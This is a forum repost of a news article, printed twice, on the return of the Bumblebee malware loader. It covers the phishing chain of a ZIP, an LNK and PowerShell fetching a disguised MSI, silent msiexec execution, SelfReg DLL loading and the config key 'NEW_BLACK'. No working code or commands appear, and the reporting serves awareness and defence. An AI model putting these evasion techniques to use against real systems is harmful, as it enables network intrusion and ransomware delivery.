Man
Professional
- Messages
- 3,070
- Reaction score
- 606
- Points
- 113
Netskope reports the first signs of the rebirth of the well-known bootloader.
The Bumblebee malicious downloader has resurfaced in the wild more than four months after its activity was halted by Europol's international operation "Endgame" in May this year.
Bumblebee, according to experts, was created by the developers of TrickBot and first appeared in 2022 as a replacement for BazarLoader. This downloader grants ransomware groups access to victims' networks.
The main distribution methods of Bumblebee are phishing, malvertising, and SEO search spam. He promoted apps such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the typical malware loads that Bumblebee distributes are Cobalt Strike beacons, data-stealers, and various ransomware versions.
In May, as part of Operation Endgame, law enforcement seized more than a hundred servers supporting the activities of several malicious downloaders, including IcedID, Pikabot, TrickBot, Bumblebee, Smokeloader, and SystemBC. Since then, Bumblebee has shown little activity. However, researchers from Netskope have recently recorded a new wave of attacks involving Bumblebee, which may indicate its return.
The attack chain begins with a phishing email offering to download an archive in ZIP format. Inside the archive there is a shortcut file (. LNK) called "Report-41952.lnk", which downloads a malicious MSI file disguised as an installer of an NVIDIA driver or Midjourney program via PowerShell.
The MSI file is executed using the "msiexec.exe" utility in silent mode (/qn option), which eliminates user interaction. To disguise its actions, the malware uses the SelfReg table, loading the DLL directly into the "msiexec.exe" space and activating its functions.
When deployed, Bumblebee loads its useful code into memory and starts the decompression process. The researchers noted that the new malware variant uses the string 'NEW_BLACK' to decrypt the configuration and two campaign IDs - 'msi' and 'lnk001.'
Although Netskope did not provide data on the scale of the campaign and the types of payloads loaded, the study highlights early signs of a possible resurgence of Bumblebee. The full list of indicators of compromise is available on GitHub.
The return of Bumblebee is a reminder that even after successful operations against cyber threats, there is no need to let your guard down – new malicious activity can always emerge from the shadows, changing appearance, but not intention.
Source
The Bumblebee malicious downloader has resurfaced in the wild more than four months after its activity was halted by Europol's international operation "Endgame" in May this year.
Bumblebee, according to experts, was created by the developers of TrickBot and first appeared in 2022 as a replacement for BazarLoader. This downloader grants ransomware groups access to victims' networks.
The main distribution methods of Bumblebee are phishing, malvertising, and SEO search spam. He promoted apps such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the typical malware loads that Bumblebee distributes are Cobalt Strike beacons, data-stealers, and various ransomware versions.
In May, as part of Operation Endgame, law enforcement seized more than a hundred servers supporting the activities of several malicious downloaders, including IcedID, Pikabot, TrickBot, Bumblebee, Smokeloader, and SystemBC. Since then, Bumblebee has shown little activity. However, researchers from Netskope have recently recorded a new wave of attacks involving Bumblebee, which may indicate its return.
The attack chain begins with a phishing email offering to download an archive in ZIP format. Inside the archive there is a shortcut file (. LNK) called "Report-41952.lnk", which downloads a malicious MSI file disguised as an installer of an NVIDIA driver or Midjourney program via PowerShell.
The MSI file is executed using the "msiexec.exe" utility in silent mode (/qn option), which eliminates user interaction. To disguise its actions, the malware uses the SelfReg table, loading the DLL directly into the "msiexec.exe" space and activating its functions.
When deployed, Bumblebee loads its useful code into memory and starts the decompression process. The researchers noted that the new malware variant uses the string 'NEW_BLACK' to decrypt the configuration and two campaign IDs - 'msi' and 'lnk001.'
Although Netskope did not provide data on the scale of the campaign and the types of payloads loaded, the study highlights early signs of a possible resurgence of Bumblebee. The full list of indicators of compromise is available on GitHub.
The return of Bumblebee is a reminder that even after successful operations against cyber threats, there is no need to let your guard down – new malicious activity can always emerge from the shadows, changing appearance, but not intention.
Source
